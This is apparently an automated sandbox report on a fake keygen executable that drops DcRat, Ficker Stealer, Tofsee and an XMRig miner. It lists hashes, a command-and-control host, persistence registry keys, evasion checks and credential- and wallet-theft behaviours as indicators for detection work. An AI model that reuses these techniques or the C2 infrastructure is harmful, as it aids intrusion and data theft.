dcrat | b2718252be051e7fbc18b319b31ef746d88407272473a465b673cea0de3c4aad

Target

keygen-step-4 — копия.exe
Size

4.6MB
MD5

563107b1df2a00f4ec868acd9e08a205
SHA1

9cb9c91d66292f5317aa50d92e38834861e9c9b7
SHA256

bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9
SHA512

99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Score

10^/10

dcrat fickerstealer tofsee xmrig discovery evasion infostealer miner persistence rat spyware stealer trojan

Malware Config

Extracted

Family

fickerstealer

sodaandcoke.top:80

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
fickerstealer
Ficker is an infostealer written in Rust and ASM.
infostealer fickerstealer
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

XMRig Miner Payload 3 IoCs

miner

resource	yara_rule
behavioral27/memory/4956-254-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral27/memory/4956-255-0x00000001402CA898-mapping.dmp	xmrig
behavioral27/memory/4956-257-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
81	4956	msiexec.exe

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe

Executes dropped EXE 16 IoCs

pid	Process
2676	xiuhuali.exe
3384	JoSetp.exe
2392	Install.exe
3076	Install.tmp
2572	Ultra.exe
3104	ultramediaburner.exe
3464	ultramediaburner.tmp
2648	UltraMediaBurner.exe
2252	Dishogyxoka.exe
3392	Rimyfyfeso.exe
4180	filee.exe
4920	5E71.tmp.exe
212	PING.EXE
4324	5E71.tmp.exe
6056	jg6_6asg.exe
4404	instEU.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Dishogyxoka.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	keygen-step-4 — копия.exe

Loads dropped DLL 2 IoCs

pid	Process
360	rundll32.exe
3076	Install.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5896	icacls.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Hixoshijyru.exe\""	Ultra.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	PING.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe"	PING.EXE

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
82	api.ipify.org
149	api.myip.com
150	api.myip.com
213	api.2ip.ua
214	api.2ip.ua
42	ip-api.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\ZDKJVQU2.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\ZDKJVQU2.cookie	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3264 set thread context of 1840	3264	svchost.exe	80
PID 212 set thread context of 4912	212	PING.EXE	102
PID 212 set thread context of 4956	212	PING.EXE	107
PID 4920 set thread context of 4324	4920	5E71.tmp.exe	109

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Microsoft.NET\Hixoshijyru.exe	Ultra.exe
File created	C:\Program Files\libEGL.dll	xiuhuali.exe
File created	C:\Program Files\install.dll	xiuhuali.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-TA0BR.tmp	ultramediaburner.tmp
File created	C:\Program Files\install.dat	xiuhuali.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-N3V9U.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Microsoft.NET\Hixoshijyru.exe.config	Ultra.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral27/files/0x000100000001ac5f-334.dat	nsis_installer_2
behavioral27/files/0x000100000001ac5f-335.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5E71.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5E71.tmp.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5468	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
5532	bitsadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5912	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 524a5871a539d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000066cddd9f904e4e739436cd5e93398f0b0efe7c95a74c486dd58c98d2094841b495a15a13cff080feebefb2a27e2f45c221bdc342c92ffed82b8425754282635c419320b1073c5196e1adeef1a515cf5937a9419f448b655b5510aa39d5fde0f8bcc18eb18cd042542990dcb08b8dd78922e2dbc45d00ffcfac515f09bf59c95f864de4e4314ea7de30b87d523336e79a2a887fb4452e2db39d679cf88036c8b00f5618c1d754e3358344f0beedaf2ca501bb4b8b68b5707a0f73dd444b359269a1fb4d442c847c14f7565292e59a7de47b9bf88b5335f077a993199e06f4ff762f5e70a52b7c95dbca0d57f76e96141a034869f8fd4de553cce834c75f14cf62a69d41d2d1ddb61450899a57a742cc003ae245b8df9f54123b93ac7ef035968f00da2dc35048db7a7feace8f184095cc3f89e6d3beca5ca93db2ccbeccf73682893390999c5b1a9f934f5911422f3bc1395d51bae16e3126d666dd46a4fa393b18ca3b9146b84d14e5daf958b0ae96cf077e215bf82b7a679ecf1f798dde8ea2b5bd2fc004fd6c2b13aa0bb20e5f704d680c890f8ba1155e734813e14d0a4c44385f2a82eaaf	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionIn = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a4883471a539d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f268626ba539d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 31b4ae6ba539d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

